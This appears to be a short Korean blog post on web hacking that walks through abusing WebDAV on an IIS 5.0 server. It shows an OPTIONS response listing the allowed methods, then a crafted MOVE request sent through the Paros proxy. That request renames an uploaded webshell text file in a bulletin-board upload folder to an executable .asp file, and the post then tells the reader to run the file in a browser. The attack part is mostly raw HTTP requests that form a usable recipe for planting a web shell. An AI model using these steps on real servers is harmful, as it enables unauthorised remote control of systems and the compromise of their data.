웹해킹 - 포트변조의 원리
0. 필요한 SW : 와이어샤크
1. GET ===> OPTIONS 지정
2. WEBDAI (웹데부) : HTTP의 확장 프로토콜 (기존에 가지고 있던 메소드들의 한계를 극복하고 확장시켜준다.)
HTTP/1.1 200
Server: Microsoft-IIS/5.0
Date: Fri, 28 May 2010 00:33:13 GMT
MS-Author-Via: MS-FP/4.0,DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2 / 웹데부의 버전/
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH /제공하는 메소드등/
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK /제공중 허용하는 메소드/
---> 파일 위치
----> Move 사용가능
---> 오버라이트 방지
3. Paros에서 이렇게 변조하자
가. paros실행 , explore에서 프락시 설정
MOVE http://www.webhacking.com/web/asp/bbs/upload/webshell8.0.txt HTTP/1.1 <---------- 게시판에 올려진 파일을 이동시킴
Accept: */*
Accept-Language: ko
UA-CPU: x86
If-Modified-Since: Thu, 06 Sep 2007 08:03:18 GMT
If-None-Match: "788eb2625cf0c71:9f2"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.webhacking.com
Destination: http://www.webhacking.com/inetpub/scripts/webshell8.0.asp <---------------- 올려진것 파일을 변조시킴 (txt ---> asp)
Proxy-Connection: Keep-Alive
나. explore에서 변조된 파일일 실행하자
http://www.webhacking.com/web/asp/bbs/upload/webshell8.0.asp
'보안 > 해킹 기법' 카테고리의 다른 글
| Apache 다중 확장자 업로드 취약점 (0) | 2012.05.01 |
|---|---|
| Triple DES (0) | 2010.08.11 |
| [MS08-067] 공격 코드 (2) | 2010.08.11 |
| DrDOS (0) | 2010.08.11 |
| Cookie 변조 (0) | 2010.08.11 |
